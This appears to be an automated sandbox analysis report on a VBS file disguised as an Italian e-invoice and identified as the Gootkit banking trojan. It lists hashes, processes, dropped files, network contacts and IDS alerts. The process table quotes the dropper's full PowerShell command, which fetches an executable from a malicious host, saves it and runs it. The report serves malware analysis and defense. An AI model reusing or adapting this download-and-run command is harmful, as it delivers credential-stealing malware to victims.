Field | Value |
---|---|
File name | _Nuovi Fattura elettronica 2018__85.vbs |
Full analysis | https://app.any.run/tasks/58ddf88f-e025-4ef3-ae12-b63ac7f60159 |
Verdict | Malicious activity |
Threats | Gootkit is an advanced banking trojan. It is extremely good at evading detection and has an incredibly effective persistence mechanism, making it dangerous malware that researchers and organizations should be aware of. |
Analysis date | December 14, 2018, 12:21:34 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags | — |
Indicators | — |
MIME | text/plain |
File info | ASCII text, with CRLF line terminators |
MD5 | B1964C6CF56F1529D255045DAF47BBF8 |
SHA1 | 111D99AAEE4714CB13EB9B8208DE1E94481A0913 |
SHA256 | 3EF1808D71F8D4CE398EF531FB16B3EACAF2FBFCCAF8E0D701209B1F94CA567C |
SSDEEP | 3072:UzhhGSxg2BcZsKv5sDZjTbL4MEe9r7a9t598HMmrqIzOPDogrCqH18oi:UzhZxg2BcyKv+J3L4ME8r7a9T9ZmrqIz |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2276 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\_Nuovi Fattura elettronica 2018__85.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
2264 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ufiyzdvfg = New-Object -ComObject Msxml2.XMLHTTP; $awyheifv = New-Object -ComObject ADODB.Stream; $sduvbjvb = $env:temp + '\tv_x64x32.exe';$ufiyzdvfg.open('GET', 'http://amd.coiten.com//upll?92818', $false);$ufiyzdvfg.send(); if($ufiyzdvfg.Status -eq "200"){$awyheifv.open();$awyheifv.type = 1;$awyheifv.write($ufiyzdvfg.responseBody);$awyheifv.position = 0;$awyheifv.savetofile($sduvbjvb);$awyheifv.close();} Start-Process $sduvbjvb; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2892 | "C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe" | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM |
552 | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe --vwxyz | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe | — | tv_x64x32.exe | User: admin; Integrity Level: MEDIUM |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ALY6L7CWLR7L1DQFGMOS.temp | — | — | — |
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | 66C674FAF5938727AFF5D90EC5445F23 | 7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272 |
2892 | tv_x64x32.exe | C:\Users\admin\AppData\Local\Temp\tv_x64x32.inf | ini | 285F9CFD07DE99934A418B86B08F16EB | FFD8E3E5F1D075D4E34C877C8CA2EC12B7277231D08E4D02F476DCFCC1149B6A |
552 | tv_x64x32.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3896776584-4254864009-862391680-1000\578c3c4f2234dc4bd77dc4898cd130e8_eeeb5d54-7880-42a7-b542-739bbc26cf4b | binary | 048DFB0DB1A17E5A42297F75919751EA | C5E610A2C0C9B6771ACAD79DF5226EB6622BC604EE051D5C0F68CEF442F1EC09 |
2264 | powershell.exe | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe | executable | A05CEB1E09CA311F7240963E262004AE | C97F69CE9AFA5737E5BB313FA621E75445B0D2758C4F9804B25118245A14EB42 |
2264 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\upll[1].txt | executable | A05CEB1E09CA311F7240963E262004AE | C97F69CE9AFA5737E5BB313FA621E75445B0D2758C4F9804B25118245A14EB42 |
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFa788a.TMP | binary | 66C674FAF5938727AFF5D90EC5445F23 | 7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
552 | tv_x64x32.exe | GET | 200 | 109.230.199.169:443 | https://drk.fm604.com/rbody32 | SE | binary | 3.75 Mb | malicious |
552 | tv_x64x32.exe | GET | 200 | 109.230.199.169:443 | https://drk.fm604.com/rbody320 | SE | text | 4 b | malicious |
2264 | powershell.exe | GET | 200 | 31.214.157.31:80 | http://amd.coiten.com//upll?92818 | NL | executable | 233 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
552 | tv_x64x32.exe | 109.230.199.169:443 | drk.fm604.com | Portlane AB | SE | malicious |
2264 | powershell.exe | 31.214.157.31:80 | amd.coiten.com | easystores GmbH | NL | malicious |
Domain | IP | Reputation |
---|---|---|
amd.coiten.com | — | malicious |
drk.fm604.com | — | malicious |
it.sunballast.de | — | unknown |
PID | Process | Class | Message |
---|---|---|---|
2264 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2264 | powershell.exe | A Network Trojan was detected | ET TROJAN Possible Windows executable sent when remote host claims to send a Text File |
552 | tv_x64x32.exe | Generic Protocol Command Decode | SURICATA STREAM excessive retransmissions |
Process | Message |
---|---|
tv_x64x32.exe | MP3 file corrupted |
tv_x64x32.exe | WMA 0 |
tv_x64x32.exe | WMA 3 |
tv_x64x32.exe | 552:C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe --vwxyz Ignition.... |
tv_x64x32.exe | JS : RUN : tv_x64x32.exe, ver : 25.10.18.1117 |
tv_x64x32.exe | OGG 0 |